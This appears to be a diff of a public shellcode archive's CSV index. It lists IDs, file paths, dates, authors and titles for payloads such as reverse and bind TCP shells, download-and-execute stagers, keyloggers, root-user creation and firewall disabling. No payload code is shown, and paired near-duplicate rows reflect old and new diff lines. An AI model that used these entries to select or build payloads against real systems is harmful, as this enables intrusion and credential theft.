17371,shellcodes/linux_x86/17371.txt,"Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4
17545,shellcodes/windows_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
@ -435,41 +435,41 @@ id,file,description,date,author,type,platform
18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips
18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips
18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve /bin/sh Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips
18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86
18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve /bin/dash Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86
20196,shellcodes/linux_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,shellcode,arm
21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,shellcode,arm
40363,shellcodes/windows_x86/40363.c,"Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40363,shellcodes/windows_x86/40363.c,"Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
22489,shellcodes/windows/22489.cpp,"Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows
40890,shellcodes/windows_x86-64/40890.c,"Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40890,shellcodes/windows_x86-64/40890.c,"Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
23622,shellcodes/linux_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,linux_x86
24318,shellcodes/windows/24318.c,"Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86
25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86
40387,shellcodes/hardware/40387.nasm,"Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips
27180,shellcodes/arm/27180.asm,"Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
27180,shellcodes/arm/27180.asm,"Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
40827,shellcodes/linux_x86/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,linux_x86
28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86
40334,shellcodes/windows_x86/40334.c,"Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86
28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86
40334,shellcodes/windows_x86/40334.c,"Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86
28996,shellcodes/windows/28996.c,"Windows - MessageBox Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows
29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
40352,shellcodes/windows_x86/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
40352,shellcodes/windows_x86/40352.c,"Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86
34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86
35205,shellcodes/linux_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) Position Independent Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64
35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
35586,shellcodes/linux_x86-64/35586.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35586,shellcodes/linux_x86-64/35586.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35793,shellcodes/windows_x86/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
35794,shellcodes/windows_x86-64/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
@ -481,8 +481,8 @@ id,file,description,date,author,type,platform
36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36637,shellcodes/linux_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,linux_x86
36672,shellcodes/linux_x86/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,linux_x86
36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",shellcode,generator
@ -494,7 +494,7 @@ id,file,description,date,author,type,platform
36781,shellcodes/generator/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86
37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve /bin/sh Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86
37251,shellcodes/linux_x86/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,linux_x86
@ -502,7 +502,7 @@ id,file,description,date,author,type,platform
37289,shellcodes/linux_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86
37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86
37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86
37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
@ -519,125 +519,143 @@ id,file,description,date,author,type,platform
37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
37895,shellcodes/windows_x86-64/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve /bin/bash Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86
38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator
38116,shellcodes/linux_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,linux_x86
38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
38150,shellcodes/linux_x86-64/38150.txt,"Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64
38194,shellcodes/android/38194.c,"Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
38194,shellcodes/android/38194.c,"Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
38959,shellcodes/generator/38959.py,"Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
39383,shellcodes/linux_x86-64/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
39388,shellcodes/linux_x86-64/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39383,shellcodes/linux_x86-64/39383.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
39388,shellcodes/linux_x86-64/39388.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
39519,shellcodes/windows_x86/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39625,shellcodes/linux_x86-64/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
39700,shellcodes/linux_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64
39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
40094,shellcodes/windows_x86/40094.c,"Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39728,shellcodes/generator/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator
39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows
39754,shellcodes/windows_x86/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86
39758,shellcodes/linux_x86-64/39758.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39763,shellcodes/linux_x86-64/39763.c,"Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39758,shellcodes/linux_x86-64/39758.c,"Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39763,shellcodes/linux_x86-64/39763.c,"Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows
39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
39847,shellcodes/linux_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
